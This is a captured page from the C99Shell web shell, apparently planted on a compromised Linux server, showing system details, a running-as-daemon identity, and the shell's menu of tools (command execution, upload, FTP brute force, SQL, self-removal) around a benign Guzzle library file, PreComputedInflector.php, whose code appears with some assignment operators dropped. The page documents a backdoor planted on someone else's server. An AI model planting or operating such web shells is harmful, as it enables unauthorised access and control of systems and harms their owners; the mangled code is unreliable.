!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/guzzle/guzzle/guzzle/src/Guzzle/Inflection/   drwxr-xr-x
Free 13.77 GB of 61.93 GB (22.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PreComputedInflector.php (1.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Guzzle\Inflection;

/**
 * Decorator used to add pre-computed inflection mappings to an inflector
 */
class PreComputedInflector implements InflectorInterface
{
    
/** @var array Array of pre-computed inflections */
    
protected $mapping = array(
        
'snake' => array(),
        
'camel' => array()
    );

    
/** @var InflectorInterface Decorated inflector */
    
protected $decoratedInflector;

    
/**
     * @param InflectorInterface $inflector Inflector being decorated
     * @param array              $snake     Hash of pre-computed camel to snake
     * @param array              $camel     Hash of pre-computed snake to camel
     * @param bool               $mirror    Mirror snake and camel reflections
     */
    
public function __construct(InflectorInterface $inflector, array $snake = array(), array $camel = array(), $mirror false)
    {
        if (
$mirror) {
            
$camel array_merge(array_flip($snake), $camel);
            
$snake array_merge(array_flip($camel), $snake);
        }

        
$this->decoratedInflector $inflector;
        
$this->mapping = array(
            
'snake' => $snake,
            
'camel' => $camel
        
);
    }

    public function 
snake($word)
    {
        return isset(
$this->mapping['snake'][$word])
            ? 
$this->mapping['snake'][$word]
            : 
$this->decoratedInflector->snake($word);
    }

    
/**
     * Converts strings from snake_case to upper CamelCase
     *
     * @param string $word Value to convert into upper CamelCase
     *
     * @return string
     */
    
public function camel($word)
    {
        return isset(
$this->mapping['camel'][$word])
            ? 
$this->mapping['camel'][$word]
            : 
$this->decoratedInflector->camel($word);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4803 ]--